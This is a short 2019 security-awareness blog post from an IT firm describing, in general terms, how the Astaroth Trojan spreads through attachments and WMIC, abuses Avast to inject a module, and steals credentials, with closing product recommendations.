FYI: The Astaroth Trojan

by

February 22, 2019

You might of heard recently that the Astaroth Trojan is making a comeback. We break down what it is, why it’s making a comeback and more…

Despite having a name that makes it sound like a lost Michael Crichton novel of Swedish Death Metal, the Astaroth Trojan is a nasty piece of code. The trojan was first detected in 2017 after it was used in multiple South American cyber attacks.

Historically solicited by email and corrupt attachments, the Trojan uses Windows Management Instrumentation Console and its command line interface to download and instal its payload. Typically its used a non-interactive mode to hide what it’s doing from the enduser.

To avoid detection Astaroth hid in plain site, using a seemingly safe domain with an additional URL snippet added on that points to its payload. Past versions, upon being installed would scan for antivirus software. If antivirus was found on the endpoint the malware would shut itself down.

This new version behaves differently. The Trojan’s payload typically disguises itself as a JPEG, GIF or an extension-less attachment. Once downloaded and opened, the new Astaroth Trojan actually leverages antivirus software, specifically Avast Free Antivirus, to inject a malicious module into one of its processes. Upon installation the malware begins to log keystrokes, intercept operating system calls and gather other PII info to steal credentials and passwords.

Because Avast is one of the most used antivirus solutions on the planet, this could be a particularly nasty piece of Malware.

The new variant was discovered by the fine folk that make up Cybereason’s Nocturnus Research team (also not a Death Metal band…I’m starting to see a trend here…hmmm…).

You can read more about Astaroth here (https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil) on Cybereason’s blog. We’ll keep you up to date if we hear anything else regarding Astaroth. Until then, if you’re using Avast we recommend you try something different. We personally recommend Cybereason’s EDR platform or CylancePROTECT.

Have anything you’d like to share regarding this topic? Lets us know by leaving a comment.

Interested in learning more about Integris? Download our free Intelligence in Depth guide today!

Carl Keyser is the Content Manager at Integris.

Keep reading

Strong Cybersecurity Postures: How to Unleash their Power

Strong Cybersecurity Postures: How to Unleash their Power

In the vast digital landscape where virtual dragons and sneaky trolls roam a strong cybersecurity posture has never been more important. Imagine a band of modern-day knights led by our protagonist, Alex. Armed with a trusty laptop and a cup of coffee, Alex navigates...

How to Spot a Phishing Attack in 2023

How to Spot a Phishing Attack in 2023

In 2023 cyber threats lurk behind every tree trunk in today's digital jungle, and cybersecurity awareness is more critical than ever. Among the craftiest of these threats are phishing attacks. Phishing attacks are cunningly engineered with social manipulation at their...